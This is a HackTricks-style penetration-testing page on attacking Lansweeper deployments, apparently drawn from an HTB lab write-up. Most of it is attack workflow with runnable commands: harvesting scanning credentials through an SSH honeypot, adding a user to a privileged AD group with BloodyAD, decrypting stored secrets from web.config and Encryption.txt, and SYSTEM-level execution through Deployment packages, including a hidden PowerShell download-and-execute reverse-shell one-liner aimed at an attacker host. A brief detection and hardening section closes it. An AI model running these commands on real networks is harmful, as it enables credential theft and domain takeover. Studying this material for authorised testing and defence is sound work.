lansweeper-security.md (8972B)
1 --- 2 title: "Lansweeper Abuse: Credential Harvesting, Secrets Decryption, and Deployment RCE" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/lansweeper-security.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/lansweeper-security.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Lansweeper Abuse: Credential Harvesting, Secrets Decryption, and Deployment RCE 14 15 Lansweeper is an IT asset discovery and inventory platform commonly deployed on Windows and integrated with Active Directory. Credentials configured in Lansweeper are used by its scanning engines to authenticate to assets over protocols like SSH, SMB/WMI and WinRM. Misconfigurations frequently allow: 16 17 - Credential interception by redirecting a scanning target to an attacker-controlled host (honeypot) 18 - Abuse of AD ACLs exposed by Lansweeper-related groups to gain remote access 19 - On-host decryption of Lansweeper-configured secrets (connection strings and stored scanning credentials) 20 - Code execution on managed endpoints via the Deployment feature (often running as SYSTEM) 21 22 This page summarizes practical attacker workflows and commands to abuse these behaviors during engagements. 23 24 ## 1) Harvest scanning credentials via honeypot (SSH example) 25 26 Idea: create a Scanning Target that points to your host and map existing Scanning Credentials to it. When the scan runs, Lansweeper will attempt to authenticate with those credentials, and your honeypot will capture them.<sup>[[1]](#references)</sup> 27 28 Steps overview (web UI): 29 - Scanning → Scanning Targets → Add Scanning Target 30 - Type: IP Range (or Single IP) = your VPN IP 31 - Configure SSH port to something reachable (e.g., 2022 if 22 is blocked) 32 - Disable schedule and plan to trigger manually 33 - Scanning → Scanning Credentials → ensure Linux/SSH creds exist; map them to the new target (enable all as needed) 34 - Click “Scan now” on the target 35 - Run an SSH honeypot and retrieve the attempted username/password 36 37 Example with sshesame:<sup>[[2]](#references)</sup> 38 39 ```yaml 40 # sshesame.conf 41 server: 42 listen_address: 10.10.14.79:2022 43 ``` 44 45 ```bash 46 # Install and run 47 sudo apt install -y sshesame 48 sshesame --config sshesame.conf 49 # Expect client banner similar to RebexSSH and cleartext creds 50 # authentication for user "svc_inventory_lnx" with password "<password>" accepted 51 # connection with client version "SSH-2.0-RebexSSH_5.0.x" established 52 ``` 53 54 Validate captured creds against DC services: 55 56 ```bash 57 # SMB/LDAP/WinRM checks (NetExec) 58 netexec smb inventory.sweep.vl -u svc_inventory_lnx -p '<password>' 59 netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>' 60 netexec winrm inventory.sweep.vl -u svc_inventory_lnx -p '<password>' 61 ``` 62 63 Notes 64 - Works similarly for other protocols when you can coerce the scanner to your listener (SMB/WinRM honeypots, etc.). SSH is often the simplest. 65 - Many scanners identify themselves with distinct client banners (e.g., RebexSSH) and will attempt benign commands (uname, whoami, etc.). 66 67 ## 2) AD ACL abuse: gain remote access by adding yourself to an app-admin group 68 69 Use BloodHound to enumerate effective rights from the compromised account. A common finding is a scanner- or app-specific group (e.g., “Lansweeper Discovery”) holding GenericAll over a privileged group (e.g., “Lansweeper Admins”). If the privileged group is also member of “Remote Management Users”, WinRM becomes available once we add ourselves.<sup>[[1]](#references)[[5]](#references)</sup> 70 71 Collection examples: 72 73 ```bash 74 # NetExec collection with LDAP 75 netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>' --bloodhound -c All --dns-server <DC_IP> 76 77 # RustHound-CE collection (zip for BH CE import) 78 rusthound-ce --domain sweep.vl -u svc_inventory_lnx -p '<password>' -c All --zip 79 ``` 80 81 Exploit GenericAll on group with BloodyAD (Linux):<sup>[[4]](#references)</sup> 82 83 ```bash 84 # Add our user into the target group 85 bloodyAD --host inventory.sweep.vl -d sweep.vl -u svc_inventory_lnx -p '<password>' \ 86 add groupMember "Lansweeper Admins" svc_inventory_lnx 87 88 # Confirm WinRM access if the group grants it 89 netexec winrm inventory.sweep.vl -u svc_inventory_lnx -p '<password>' 90 ``` 91 92 Then get an interactive shell: 93 94 ```bash 95 evil-winrm -i inventory.sweep.vl -u svc_inventory_lnx -p '<password>' 96 ``` 97 98 Tip: Kerberos operations are time-sensitive. If you hit KRB_AP_ERR_SKEW, sync to the DC first: 99 100 ```bash 101 sudo ntpdate <dc-fqdn-or-ip> # or rdate -n <dc-ip> 102 ``` 103 104 ## 3) Decrypt Lansweeper-configured secrets on the host 105 106 On the Lansweeper server, the ASP.NET site typically stores an encrypted connection string and a symmetric key used by the application. With appropriate local access, you can decrypt the DB connection string and then extract stored scanning credentials.<sup>[[1]](#references)</sup> 107 108 Typical locations: 109 - Web config: `C:\Program Files (x86)\Lansweeper\Website\web.config` 110 - `<connectionStrings configProtectionProvider="DataProtectionConfigurationProvider">` … `<EncryptedData>…` 111 - Application key: `C:\Program Files (x86)\Lansweeper\Key\Encryption.txt` 112 113 Use SharpLansweeperDecrypt to automate decryption and dumping of stored creds:<sup>[[3]](#references)</sup> 114 115 ```powershell 116 # From a WinRM session or interactive shell on the Lansweeper host 117 # PowerShell variant 118 Upload-File .\LansweeperDecrypt.ps1 C:\ProgramData\LansweeperDecrypt.ps1 # depending on your shell 119 powershell -ExecutionPolicy Bypass -File C:\ProgramData\LansweeperDecrypt.ps1 120 # Tool will: 121 # - Decrypt connectionStrings from web.config 122 # - Connect to Lansweeper DB 123 # - Decrypt stored scanning credentials and print them in cleartext 124 ``` 125 126 Expected output includes DB connection details and plaintext scanning credentials such as Windows and Linux accounts used across the estate. These often have elevated local rights on domain hosts: 127 128 ```text 129 Inventory Windows SWEEP\svc_inventory_win <StrongPassword!> 130 Inventory Linux svc_inventory_lnx <StrongPassword!> 131 ``` 132 133 Use recovered Windows scanning creds for privileged access: 134 135 ```bash 136 netexec winrm inventory.sweep.vl -u svc_inventory_win -p '<StrongPassword!>' 137 # Typically local admin on the Lansweeper-managed host; often Administrators on DCs/servers 138 ``` 139 140 ## 4) Lansweeper Deployment → SYSTEM RCE 141 142 As a member of “Lansweeper Admins”, the web UI exposes Deployment and Configuration. Under Deployment → Deployment packages, you can create packages that run arbitrary commands on targeted assets. Execution is performed by the Lansweeper service with high privilege, yielding code execution as NT AUTHORITY\SYSTEM on the selected host.<sup>[[1]](#references)</sup> 143 144 High-level steps: 145 - Create a new Deployment package that runs a PowerShell or cmd one-liner (reverse shell, add-user, etc.). 146 - Target the desired asset (e.g., the DC/host where Lansweeper runs) and click Deploy/Run now. 147 - Catch your shell as SYSTEM. 148 149 Example payloads (PowerShell): 150 151 ```powershell 152 # Simple test 153 powershell -nop -w hidden -c "whoami > C:\Windows\Temp\ls_whoami.txt" 154 155 # Reverse shell example (adapt to your listener) 156 powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/rs.ps1')" 157 ``` 158 159 OPSEC 160 - Deployment actions are noisy and leave logs in Lansweeper and Windows event logs. Use judiciously. 161 162 ## Detection and hardening 163 164 - Restrict or remove anonymous SMB enumerations. Monitor for RID cycling and anomalous access to Lansweeper shares. 165 - Egress controls: block or tightly restrict outbound SSH/SMB/WinRM from scanner hosts. Alert on non-standard ports (e.g., 2022) and unusual client banners like Rebex. 166 - Protect `Website\\web.config` and `Key\\Encryption.txt`. Externalize secrets into a vault and rotate on exposure. Consider service accounts with minimal privileges and gMSA where viable. 167 - AD monitoring: alert on changes to Lansweeper-related groups (e.g., “Lansweeper Admins”, “Remote Management Users”) and on ACL changes granting GenericAll/Write membership on privileged groups. 168 - Audit Deployment package creations/changes/executions; alert on packages spawning cmd.exe/powershell.exe or unexpected outbound connections. 169 170 ## Related topics 171 - SMB/LSA/SAMR enumeration and RID cycling 172 - Kerberos password spraying and clock skew considerations 173 - BloodHound path analysis of application-admin groups 174 - WinRM usage and lateral movement 175 176 ## References 177 - [1] [HTB: Sweep — Abusing Lansweeper Scanning, AD ACLs, and Secrets to Own a DC (0xdf)](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html) 178 - [2] [sshesame (SSH honeypot)](https://github.com/jaksi/sshesame) 179 - [3] [SharpLansweeperDecrypt](https://github.com/Yeeb1/SharpLansweeperDecrypt) 180 - [4] [BloodyAD](https://github.com/CravateRouge/bloodyAD) 181 - [5] [BloodHound CE](https://github.com/SpecterOps/BloodHound)